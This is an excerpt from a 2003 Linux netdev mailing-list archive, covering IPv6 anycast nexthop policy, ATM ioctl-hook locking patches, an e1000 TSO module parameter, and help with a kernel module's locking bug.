Message-Id: <200307142349.DAA06134@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: davem@redhat.com (David S. Miller) Date: Tue, 15 Jul 2003 03:49:43 +0400 (MSD) Cc: netdev@oss.sgi.com In-Reply-To: <20030710.214551.08349572.davem@redhat.com> from "David S. 
Miller" at Jul 10, 2003 09:45:51 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4029 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Alexey, please add some sanity to this discussion. It is about anycast addresses; I may not be competent here. I have no idea what the purpose of the all-routers anycast is. However, my modest opinion is this: IN NO WAY MAY ANYCAST ADDRESSES BE USED AS NEXTHOP ADDRESSES. THE NEXTHOP ADDRESS IS THE ADDRESS WHICH IS EXPECTED TO BE THE SOURCE OF REDIRECT MESSAGES ET AL. ANYCAST ADDRESSES ARE INVALID AS SOURCE, HENCE... Period. Alexey From davem@redhat.com Mon Jul 14 17:12:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:12:41 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0CZFl017433 for ; Mon, 14 Jul 2003 17:12:35 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA12223; Mon, 14 Jul 2003 17:03:01 -0700 Date: Mon, 14 Jul 2003 17:03:01 -0700 From: "David S. 
Miller" To: Roberto Nibali Cc: albertogli@telpin.com.ar, netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: Re: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo Message-Id: <20030714170301.4ae9953a.davem@redhat.com> In-Reply-To: <3F130F84.8010104@drugphish.ch> References: <20030714140350.GB1389@telpin.com.ar> <3F130F84.8010104@drugphish.ch> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4030 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 22:16:04 +0200 Roberto Nibali wrote: > > --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 > > +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 > > @@ -147,7 +147,7 @@ > > Obviously correct. Dave, if you haven't already, please apply to your > tree, thanks. We're working on the 2.4.x patch ;). Applied, I'm also still waiting for the timer fix on the 2.5.x side. The IPVS stuff went into 2.6.0-test1 BTW. From davem@redhat.com Mon Jul 14 17:20:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:21:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0KuFl017850 for ; Mon, 14 Jul 2003 17:20:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA12254; Mon, 14 Jul 2003 17:11:19 -0700 Date: Mon, 14 Jul 2003 17:11:18 -0700 From: "David S. 
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] cleanup pppoatm and br2684 modules Message-Id: <20030714171118.63b33243.davem@redhat.com> In-Reply-To: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> References: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4031 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 17:06:14 -0400 chas williams wrote: > this should be applied to the latest 2.5 sources... Applied, thanks. From kumarkr@us.ibm.com Mon Jul 14 17:28:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:28:58 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0SjFl018246 for ; Mon, 14 Jul 2003 17:28:52 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6F0SUc8249838; Mon, 14 Jul 2003 20:28:30 -0400 Received: from d03nm801.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6F0SQbT054882; Mon, 14 Jul 2003 18:28:27 -0600 Subject: Re: Kernel locking up in module To: N N Ashok Cc: netdev@oss.sgi.com, Stephen Hemminger X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: From: Krishna Kumar Date: Mon, 14 Jul 2003 17:28:25 -0700 X-MIMETrack: Serialize by Router on D03NM801/03/M/IBM(Release 6.0.1 [IBM]|June 10, 2003) at 07/14/2003 18:28:29 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII X-archive-position: 4032 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 
netdev-bounce@oss.sgi.com X-original-sender: kumarkr@us.ibm.com Precedence: bulk X-list: netdev > > but the variable is non-null every other time I insert the module. Are you adding any new devices after the init() routine executes ? You seem to have exited the for loop due to bwusage becoming NULL, not the dev (while both should be null). > You are not locking out the bottom half receive thread so it will deadlock Stephen, I don't understand how this is a deadlock ? His handler runs only in the bottom half and he has no other code which runs in regular or hard interrupt context. But you might want to try doing the mod_timer after dropping the lock to avoid a race (though not very likely ?). Unless it is re-entrant, which seems unlikely since he is using a 1 second timeout. BTW, you are assigning 'data' in your routine, which is OK, unsigned long *data = (unsigned long *) ptr; but if you reference it, that will crash the system since it is referring to a local stack variable of another routine. - KK N N Ashok (sent by netdev-bounce@oss.sgi.com), 07/14/2003 04:35 PM To: Stephen Hemminger cc: netdev@oss.sgi.com Subject: Re: Kernel locking up in module On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > On Mon, 14 Jul 2003 17:46:30 -0400 > > N N Ashok wrote: > > Hi All, > > I am creating a module to measure the outgoing bandwidth usage on the > > interfaces. It uses the get_stats() of the device to get the current > > stats and then computes the bandwidth usage. The algorithm for the usage > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). 
The > > problem is that the kernel keeps locking up. I am using rwlock_t locks to > > lock the data. In the code, I traverse the list of bwuage structures and > > as a debug message am printing whether the traversal ended in the > > variable becoming null (which it should if everything went right), but > > the variable is non-null every other time I insert the module. > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > I think this has got to do with some locking issues. As this is my > > first go at the kernel locking, I might have used the wrong kind of > > locks. I have attached the module source, header and the log messages as > > I inserted the module a couple of times. I request you all to please help > > me as I am totally lost here. > > > > Thanks, > > Ashok > > You are not locking out the bottom half receive thread so it will deadlock > when it runs while your code holds the top half lock. Hi Stephen, Thanks for the reply. Do I used write_lock_bh()/write_unlock_bh() for my lock (bwusage_head_lock) while still using read_lock() for dev_base_lock ? 
Thanks, Ashok From kuznet@ms2.inr.ac.ru Mon Jul 14 17:29:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:29:57 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0TqFl018558 for ; Mon, 14 Jul 2003 17:29:53 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA06610; Tue, 15 Jul 2003 04:29:44 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307150029.EAA06610@dub.inr.ac.ru> Subject: Re: [PATCH] IPv6: Fix broken anycast usage To: mika.liljeberg@welho.COM (Mika Liljeberg) Date: Tue, 15 Jul 2003 04:29:44 +0400 (MSD) Cc: netdev@oss.sgi.com In-Reply-To: <1057997590.1142.31.camel@hades> from "Mika Liljeberg" at Jul 12, 2003 12:45:01 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4033 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > this doesn't need to be policed. In general, there is no reliable way to > check if a remote address is anycast, anyway. From RFC2461: > > Note that an anycast address is syntactically > indistinguishable from a unicast address. This is right. (Well, except for the fact that reserved anycasts are very well syntactically distinguished. :-)) But this does not matter, the patch is correct: ANYCAST is an additional attribute on unicast addresses, and it should be checked only in contexts where _this_ host is a member of this anycast. BTW, this is an addendum to my previous mail. You were right to complain about EINVAL for an anycast nexthop. However: the nexthop address is the unique identifier of the nexthop router. We do not enforce this policy (see comments in route.c), hence it is a bug to reject such routes and you are right, but this does not make your example more reasonable. 
Any non-unicast non-linklocal address used as a nexthop is a bad idea. This policy is not enforced, to allow the use of global nexthops on BGP routers, where it is convenient to use global addresses for nexthop resolution and where it is legal because they are not expected to receive redirects. This is legal in your case of a PtP link too; however, it is still nasty. Alexey From kuznet@ms2.inr.ac.ru Mon Jul 14 18:18:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 18:18:22 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F1IBFl020106 for ; Mon, 14 Jul 2003 18:18:12 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id FAA06705; Tue, 15 Jul 2003 05:17:53 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307150117.FAA06705@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Tue, 15 Jul 2003 05:17:53 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, kuznet@ms2.inr.ac.ru, krkumar@us.ibm.com In-Reply-To: from "Krishna Kumar" at Jul 14, 2003 03:35:15 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4034 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to > IPv6. Are you agreeable to this ? ... > + IFA_IFFLAGS, What about ifa_flags? There is some space there, and the things kept there now (TENTATIVE/DEPRECATED et al.) are close relatives of O/M. > - I believe we need #3 for the reasons given above. This does not pass Occam's razor. Why not give a filter to plain RTM_GETROUTE? 
We did not implement filtering not because we do not want it, but because we (or rather, I) are lazy. Also, I am not sure that the interface should include things of the sort + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) For the kernel they are all direct routes; if the application wants to apply some policy not formulated in terms of filters for RTM_GETROUTE, let it filter by itself. Moreover, I used to emphasize that a user of rtnetlink should not rely on kernel filtering. This is just a necessary measure to guarantee that a new application, which is aware of a new attribute, will behave correctly with older kernels, which are not aware of this attribute. Not a requirement, of course. Anyway, if you want to apply such a specific policy, you can add a flag to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX, and base filtering on this flag when it is given. Alexey From chas@locutus.cmf.nrl.navy.mil Mon Jul 14 20:01:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 20:02:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F31XFl022011 for ; Mon, 14 Jul 2003 20:01:33 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6EL8fsG021288; Mon, 14 Jul 2003 17:08:41 -0400 (EDT) Message-Id: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] cleanup pppoatm and br2684 modules Reply-To: chas3@users.sourceforge.net Date: Mon, 14 Jul 2003 17:06:14 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . 
com / mimedefang)
X-archive-position: 4035
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: chas@cmf.nrl.navy.mil
Precedence: bulk
X-list: netdev

this should be applied to the latest 2.5 sources...

[atm]: cleanup pppoatm_ioctl_hook

# This is a BitKeeper generated patch for the following project:
# Project Name: Linux kernel tree
# This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas:
#	           ChangeSet	1.1362  -> 1.1363
#	   net/atm/pppoatm.c	1.7     -> 1.8
#	    net/atm/common.h	1.13    -> 1.14
#	    net/atm/common.c	1.38    -> 1.39
#
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 03/06/21	chas@relax.cmf.nrl.navy.mil	1.1363
# pppoatm.c, common.h, common.c:
#   cleanup pppoatm_ioctl_hook
# --------------------------------------------
#
diff -Nru a/net/atm/common.c b/net/atm/common.c
--- a/net/atm/common.c	Mon Jun 23 09:45:58 2003
+++ b/net/atm/common.c	Mon Jun 23 09:45:58 2003
@@ -129,8 +129,19 @@
 #endif
 
 #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE)
-int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
-EXPORT_SYMBOL(pppoatm_ioctl_hook);
+static DECLARE_MUTEX(pppoatm_ioctl_mutex);
+
+static int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
+
+void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long))
+{
+	down(&pppoatm_ioctl_mutex);
+	pppoatm_ioctl_hook = hook;
+	up(&pppoatm_ioctl_mutex);
+}
+#ifdef CONFIG_PPPOATM_MODULE
+EXPORT_SYMBOL(pppoatm_ioctl_set);
+#endif
 #endif
 
 #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE)
@@ -865,12 +876,14 @@
 		default:
 			break;
 	}
+	error = -ENOIOCTLCMD;
 #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE)
-	if (pppoatm_ioctl_hook) {
+	down(&pppoatm_ioctl_mutex);
+	if (pppoatm_ioctl_hook)
 		error = pppoatm_ioctl_hook(vcc, cmd, arg);
-		if (error != -ENOIOCTLCMD)
-			goto done;
-	}
+	up(&pppoatm_ioctl_mutex);
+	if (error != -ENOIOCTLCMD)
+		goto done;
 #endif
 #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE)
 	if (br2684_ioctl_hook) {
diff -Nru a/net/atm/common.h b/net/atm/common.h
--- a/net/atm/common.h	Mon Jun 23 09:45:58 2003
+++ b/net/atm/common.h	Mon Jun 23 09:45:58 2003
@@ -26,6 +26,8 @@
 
 void atm_shutdown_dev(struct atm_dev *dev);
 
+void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long));
+
 int atmpvc_init(void);
 void atmpvc_exit(void);
 int atmsvc_init(void);
diff -Nru a/net/atm/pppoatm.c b/net/atm/pppoatm.c
--- a/net/atm/pppoatm.c	Mon Jun 23 09:45:58 2003
+++ b/net/atm/pppoatm.c	Mon Jun 23 09:45:58 2003
@@ -44,6 +44,8 @@
 #include
 #include
 
+#include "common.h"
+
 #if 0
 #define DPRINTK(format, args...) \
 	printk(KERN_DEBUG "pppoatm: " format, ##args)
@@ -344,17 +346,15 @@
 /* the following avoids some spurious warnings from the compiler */
 #define UNUSED __attribute__((unused))
 
-extern int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
-
 static int __init UNUSED pppoatm_init(void)
 {
-	pppoatm_ioctl_hook = pppoatm_ioctl;
+	pppoatm_ioctl_set(pppoatm_ioctl);
 	return 0;
 }
 
 static void __exit UNUSED pppoatm_exit(void)
 {
-	pppoatm_ioctl_hook = NULL;
+	pppoatm_ioctl_set(NULL);
 }
 
 module_init(pppoatm_init);


[atm]: cleanup br2684_ioctl_hook

# This is a BitKeeper generated patch for the following project:
# Project Name: Linux kernel tree
# This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas:
#	           ChangeSet	1.1363  -> 1.1364
#	    net/atm/br2684.c	1.3     -> 1.4
#	    net/atm/common.h	1.14    -> 1.15
#	    net/atm/common.c	1.39    -> 1.40
#
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 03/06/21	chas@relax.cmf.nrl.navy.mil	1.1364
# common.h, common.c, br2684.c:
#   cleanup br2684_ioctl_hook
# --------------------------------------------
#
diff -Nru a/net/atm/br2684.c b/net/atm/br2684.c
--- a/net/atm/br2684.c	Mon Jun 23 09:45:37 2003
+++ b/net/atm/br2684.c	Mon Jun 23 09:45:37 2003
@@ -16,9 +16,12 @@
 #include
 #include
 #include
+#include
+#include
 #include
 
+#include "common.h"
 #include "ipcommon.h"
 
 /*
@@ -768,8 +771,6 @@
 
 extern struct proc_dir_entry *atm_proc_root;	/* from proc.c */
 
-extern int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
-
 /* the following avoids some spurious warnings from the compiler */
 #define UNUSED __attribute__((unused))
 
@@ -779,14 +780,14 @@
 	if ((p = create_proc_entry("br2684", 0, atm_proc_root)) == NULL)
 		return -ENOMEM;
 	p->proc_fops = &br2684_proc_operations;
-	br2684_ioctl_hook = br2684_ioctl;
+	br2684_ioctl_set(br2684_ioctl);
 	return 0;
 }
 
 static void __exit UNUSED br2684_exit(void)
 {
 	struct br2684_dev *brdev;
-	br2684_ioctl_hook = NULL;
+	br2684_ioctl_set(NULL);
 	remove_proc_entry("br2684", atm_proc_root);
 	while (!list_empty(&br2684_devs)) {
 		brdev = list_entry_brdev(br2684_devs.next);
diff -Nru a/net/atm/common.c b/net/atm/common.c
--- a/net/atm/common.c	Mon Jun 23 09:45:37 2003
+++ b/net/atm/common.c	Mon Jun 23 09:45:37 2003
@@ -145,9 +145,18 @@
 #endif
 
 #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE)
-int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
+static DECLARE_MUTEX(br2684_ioctl_mutex);
+
+static int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long);
+
+void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long))
+{
+	down(&br2684_ioctl_mutex);
+	br2684_ioctl_hook = hook;
+	up(&br2684_ioctl_mutex);
+}
 #ifdef CONFIG_ATM_BR2684_MODULE
-EXPORT_SYMBOL(br2684_ioctl_hook);
+EXPORT_SYMBOL(br2684_ioctl_set);
 #endif
 #endif
 
@@ -886,11 +895,12 @@
 		goto done;
 #endif
 #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE)
-	if (br2684_ioctl_hook) {
+	down(&br2684_ioctl_mutex);
+	if (br2684_ioctl_hook)
 		error = br2684_ioctl_hook(vcc, cmd, arg);
-		if (error != -ENOIOCTLCMD)
-			goto done;
-	}
+	up(&br2684_ioctl_mutex);
+	if (error != -ENOIOCTLCMD)
+		goto done;
 #endif
 
 	error = atm_dev_ioctl(cmd, arg);
diff -Nru a/net/atm/common.h b/net/atm/common.h
--- a/net/atm/common.h	Mon Jun 23 09:45:37 2003
+++ b/net/atm/common.h	Mon Jun 23 09:45:37 2003
@@ -27,6 +27,7 @@
 void atm_shutdown_dev(struct atm_dev *dev);
 
 void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long));
+void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long));
 
 int atmpvc_init(void);
 void atmpvc_exit(void);

From scott.feldman@intel.com Mon Jul 14 21:42:52 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:43:30 -0700 (PDT)
Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4gpFl023956 for ; Mon, 14 Jul 2003 21:42:51 -0700
Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6F4avj01043 for ; Tue, 15 Jul 2003 04:36:57 GMT
Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6F4bsU09258 for ; Tue, 15 Jul 2003 04:37:54 GMT
Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071421424104145 ; Mon, 14 Jul 2003 21:42:41 -0700
Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by
 orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 21:42:41 -0700
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0
Subject: RE: [patch] e1000 TSO parameter
Date: Mon, 14 Jul 2003 21:42:40 -0700
Message-ID:
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: [patch] e1000 TSO parameter
Thread-Index: AcNKZ+mReyrU+xYURTSavf3gjrZ7aQAHMc8w
From: "Feldman, Scott"
To:
Cc: ,
X-OriginalArrivalTime: 15 Jul 2003 04:42:41.0290 (UTC) FILETIME=[866FF6A0:01C34A8B]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6F4gpFl023956
X-archive-position: 4036
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: scott.feldman@intel.com
Precedence: bulk
X-list: netdev

[Moving over to netdev]

> Hi Scott,
>
> Would you mind applying the attached patch for the e1000
> driver?  The patch adds a "TSO" option which lets you disable
> TSO at boot-time/module-insertion time.  This is useful for
> experimentation and, on fast machines, you can actually get
> better netperf numbers with TSO disabled. ;-)

This is interesting.  I assume you're trying to get the best throughput
regardless of CPU utilization.  Why are we getting lower throughput
rates with TSO enabled?  It's an open question for netdev.  Do you have
any data to share?

> Note that I had to move the e1000_check_options() call to a
> slightly earlier place.  You may want to double-check that
> it's really OK.

I'm not too keen on adding another module parameter.  Maybe a
CONFIG_E1000_TSO option?

> The patch is relative to 2.5.75.
>
> Thanks,
>
> 	--david
>
> # This is a BitKeeper generated patch for the following project:
> # Project Name: Linux kernel tree
> # This patch format is intended for GNU patch command version 2.5 or higher.
> # This patch includes the following deltas:
> #	                   ChangeSet	1.1379  -> 1.1380
> #	   drivers/net/e1000/e1000.h	1.33    -> 1.34
> #	drivers/net/e1000/e1000_main.c	1.77    -> 1.78
> #	drivers/net/e1000/e1000_param.c	1.21    -> 1.22
> #
> # The following is the BitKeeper ChangeSet Log
> # --------------------------------------------
> # 03/07/14	davidm@tiger.hpl.hp.com	1.1380
> # Make it possible to disable TSO at module-load time (or boot-time).
> # This is controlled via the TSO parameter (e.g., modprobe e1000 TSO=0,0,0,0
> # will disable TSO on the first 4 e1000 NICs).
> # --------------------------------------------
> #
> diff -Nru a/drivers/net/e1000/e1000.h b/drivers/net/e1000/e1000.h
> --- a/drivers/net/e1000/e1000.h	Mon Jul 14 17:29:30 2003
> +++ b/drivers/net/e1000/e1000.h	Mon Jul 14 17:29:30 2003
> @@ -194,6 +194,7 @@
>  	uint32_t tx_head_addr;
>  	uint32_t tx_fifo_size;
>  	atomic_t tx_fifo_stall;
> +	boolean_t tso;
>  
>  	/* RX */
>  	struct e1000_desc_ring rx_ring;
> diff -Nru a/drivers/net/e1000/e1000_main.c b/drivers/net/e1000/e1000_main.c
> --- a/drivers/net/e1000/e1000_main.c	Mon Jul 14 17:29:30 2003
> +++ b/drivers/net/e1000/e1000_main.c	Mon Jul 14 17:29:30 2003
> @@ -417,9 +417,12 @@
>  		netdev->features = NETIF_F_SG;
>  	}
>  
> +	e1000_check_options(adapter);
> +
>  #ifdef NETIF_F_TSO
>  	if((adapter->hw.mac_type >= e1000_82544) &&
> -	   (adapter->hw.mac_type != e1000_82547))
> +	   (adapter->hw.mac_type != e1000_82547) &&
> +	   adapter->tso)
>  		netdev->features |= NETIF_F_TSO;
>  #endif
>  
> @@ -469,7 +472,6 @@
>  
>  	printk(KERN_INFO "%s: Intel(R) PRO/1000 Network Connection\n",
>  	       netdev->name);
> -	e1000_check_options(adapter);
>  
>  	/* Initial Wake on LAN setting
>  	 * If APM wake is enabled in the EEPROM,
> diff -Nru a/drivers/net/e1000/e1000_param.c b/drivers/net/e1000/e1000_param.c
> --- a/drivers/net/e1000/e1000_param.c	Mon Jul 14 17:29:30 2003
> +++ b/drivers/net/e1000/e1000_param.c	Mon Jul 14 17:29:30 2003
> @@ -192,6 +192,16 @@
>  
>  E1000_PARAM(InterruptThrottleRate, "Interrupt Throttling Rate");
>  
> +/* Enable TSO - TCP Segmentation Offload Enable/Disable
> + *
> + * Valid Range: 0, 1
> + *  - 0 - disables TSO
> + *  - 1 - enables TSO on NICs that are TSO capable
> + *
> + * Default Value: 1
> + */
> +E1000_PARAM(TSO, "Disable or enable TSO");
> +
>  #define AUTONEG_ADV_DEFAULT  0x2F
>  #define AUTONEG_ADV_MASK     0x2F
>  #define FLOW_CONTROL_DEFAULT FLOW_CONTROL_FULL
> @@ -454,6 +464,18 @@
>  		} else {
>  			e1000_validate_option(&adapter->itr, &opt);
>  		}
> +	}
> +	{ /* TSO Enable/Disable */
> +		struct e1000_option opt = {
> +			.type = enable_option,
> +			.name = "TSO",
> +			.err  = "defaulting to Enabled",
> +			.def  = OPTION_ENABLED
> +		};
> +
> +		int tso = TSO[bd];
> +		e1000_validate_option(&tso, &opt);
> +		adapter->tso = tso;
>  	}
>  
>  	switch(adapter->hw.media_type) {
>

From davem@redhat.com Mon Jul 14 21:54:26 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:55:00 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4sQFl024415 for ; Mon, 14 Jul 2003 21:54:26 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA12652; Mon, 14 Jul 2003 21:45:10 -0700
Date: Mon, 14 Jul 2003 21:45:10 -0700
From: "David S.
Miller"
To: "Feldman, Scott"
Cc: davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: [patch] e1000 TSO parameter
Message-Id: <20030714214510.17e02a9f.davem@redhat.com>
In-Reply-To:
References:
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4037
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Mon, 14 Jul 2003 21:42:40 -0700
"Feldman, Scott" wrote:

> > Note that I had to move the e1000_check_options() call to a
> > slightly earlier place.  You may want to double-check that
> > it's really OK.
>
> I'm not too keen on adding another module parameter.  Maybe a
> CONFIG_E1000_TSO option?

Extend ethtool please :-)

From davidm@napali.hpl.hp.com Mon Jul 14 21:57:12 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:57:45 -0700 (PDT)
